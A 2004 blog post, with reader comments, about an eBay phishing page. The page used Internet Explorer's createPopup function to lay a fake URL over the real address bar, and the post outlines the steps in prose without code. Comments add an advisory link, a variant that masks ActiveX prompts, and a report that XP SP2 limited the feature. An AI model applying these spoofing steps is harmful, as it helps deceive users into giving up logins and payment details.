June 9, 2004
R.I.P. IE 1995-2004
This may very well be the last nail in Internet Explorer's coffin. While reviewing my junk mail this morning I came across the latest in a series of IE exploits used in credit card and identity theft.
The email was a run-of-the-mill forgery purporting to be from eBay. The message contained a link to a replica of the eBay login page, whose sole purpose was to harvest logins and personal information. Call me Captain Obvious, but the IP address in the address bar was a dead giveaway. I was about to move on when my curiosity got the better of me and I decided to see what the page looked like in IE (Firefox being my default).
When viewed in Internet Explorer 5.5-6.0, I was surprised to see an eBay URL in the address bar instead of the actual one. Since I had already installed the patch for a similar vulnerability several months prior, I knew something new was afoot.
The source quickly revealed what was happening. IE has a proprietary function, createPopup, that allows you to create custom popup windows on a web page. These windows may be positioned anywhere, have no chrome and always close when the user clicks away from them. In this case, a popup is used to overlay the actual address with a false one.
The exploit is extremely simple:
- A popup window is created containing the URL being spoofed (EBay in this case), formatted to look like the text in the address bar.
- A listener is added so that if the popup is about to close—that is, the user clicks away and the unload event fires—the show method is called to ensure it stays visible.
- Whenever the show method is called, the dimensions and position of the popup are recalculated so that it fits within the bounds of the address bar and overlays the real address. That way, if the browser window is moved or resized, the popup follows it accordingly.
While there were some reports of this exploit in May, there has been no media attention since then and it has remained relatively unknown despite its severity. Odds are it will continue to get worse until action is taken, but by then it may be too late for Internet Explorer.
I say this is the end of IE not because this exploit is being used in new and unanticipated ways. Rather, this is the end because Microsoft is in a lose-lose situation and for many users this will be the last straw. This exploit is unique in that it is based on a feature that is intrinsic to IE. For better or worse, many web sites and intranet applications depend on the createPopup function for things such as custom menus, dialogs and other legitimate uses. It is virtually impossible for Microsoft to patch this vulnerability without crippling these users. But to leave it as-is would be an even bigger disaster.
If you or your parents/friends/employees/pets are still using Internet Explorer, now is as good a time as any to try something new.
Posted by jon at June 9, 2004 2:41 AMComments
Come on, if you're stupid enough to not notice a pop-up, you deserve to be exploited.
This is dumb, and they're calling this a "critical" problem now. Why don't people understand that the Internet is a web application platform -- it's not just made for old ladies selling quilts on eBay. It's a powerful development environment and calling it's capabilities "flaws" is just stupid. Educate people -- don't cripple development tools!!
I for one hope they leave createPopup() alone. It makes for some very sexy menus...
>if you're stupid enough to not notice a pop-up, you deserve to be exploited.
Perhaps, but this vulnerability goes beyond that. It can be used to totally mask an ActiveX installation prompt so that it appears entirely legitimate:
http://www.securiteam.com/windowsntfocus/5RP0G1FAKC.html
There's a link to an example of the exploit towards the bottom of the page. You and I would think twice before clicking, but your average user over the age of 30 would probably just click yes since it's a "legitimate" warning.
Don't know how feasible it would be, but IMHO the ideal solution would be for Microsoft to partially cripple createPopup -- only allow it to be over the viewport of the window calling it and nowhere else (other windows or areas of the screen). That way it retains its basic functionality but can't e exploited in the same way.
Posted by: jon at July 13, 2004 11:59 AM> Come on, if you're stupid enough to not notice a pop-up, you deserve to be exploited.
In the case with this phishing scam, there is no "popup" to speak of, so anybody using IE could be suckered into thinking the page was legit.
Technically there *is* a popup, but not in the traditional sense. A fake address covers up the real address bar, remains over it if the window is moved, and cannot be detected visually unless you move the window very quickly. Because people generally trust the address bar, this is a very serious security hole.
Posted by: jon at July 13, 2004 12:34 PMI just came across this article while trying out whether the new IE in XP SP2 is still vulnerable to various exploits and I'm happy to report that it seems that IE does now limit the createPopup functionality in the viewport of the current page as jon suggested in the previous comment.
Let's just hope that the fix is a solid one that's not worked around in a few days...
Posted by: nerve at July 13, 2004 12:39 PM
What a great story. I have been working on my site and my default browser is Firefox, and I went to my site in IE 5.5 and it looked bad. Looks great in my FF, but I then checked out some of the CSS leader's sites and their sites were blown out in IE too. I'm bailing IE - Later IE nice to meetcha...
Posted by: Matt W. at June 26, 2004 4:59 PM